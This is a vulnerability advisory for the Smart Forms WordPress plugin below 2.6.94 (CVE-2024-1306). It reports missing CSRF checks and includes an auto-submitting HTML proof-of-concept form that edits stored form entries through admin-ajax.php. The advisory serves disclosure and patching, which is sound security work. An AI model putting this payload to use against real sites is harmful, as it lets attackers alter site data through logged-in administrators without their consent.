WordPress Plugin Vulnerabilities

Smart Forms < 2.6.94 - Edit Entries via CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as editing entries, and we consider it a medium risk.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF PoC</title>
</head>
<body>
  <h1>CSRF PoC</h1>
  <form id="csrfForm" action="https://YOUR-WEBSITE-URL/wp-admin/admin-ajax.php" method="post" style="display: none;">
    <input type="hidden" name="action" value="rednao_smart_forms_edit_form_values">
    <input type="hidden" name="entryId" value="7">
    <input type="hidden" name="entryString" value="{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}">
    <input type="hidden" name="elementOptions" value="[{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}]">
  </form>
  <script>
    // Automatically submit the form when the page loads
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>

Affects Plugins

Plugin icon
smart-forms
Fixed in 2.6.94

References

CVE
CVE-2024-1306

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Amir Hossein Fallahi
Submitter
Amir Hossein Fallahi
Submitter website
https://securityflaws.net/
Submitter twitter
amir_h_fallahi/
Verified
Yes
WPVDB ID
c7ce2649-b2b0-43f4-994d-07b1023405e9

Timeline

Publicly Published
2024-03-25 (about 1 months ago)
Added
2024-03-25 (about 1 months ago)
Last Updated
2024-03-25 (about 1 months ago)

Other

Published
Title
Published
2024-04-11
Title
Wow Skype Buttons < 4.0.4 - Button Deletion via CSRF
Published
2023-03-16
Title
Event Manager for WooCommerce < 3.7.8 - Cross-Site Request Forgery (CSRF)
Published
2024-04-05
Title
Smart Online Order for Clover < 1.5.5 - Cross-Site Request Forgery
Published
2015-06-15
Title
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
Published
2020-10-14
Title
Child Theme Creator by Orbisius < 1.5.2 - CSRF to Arbitrary File Modification/Creation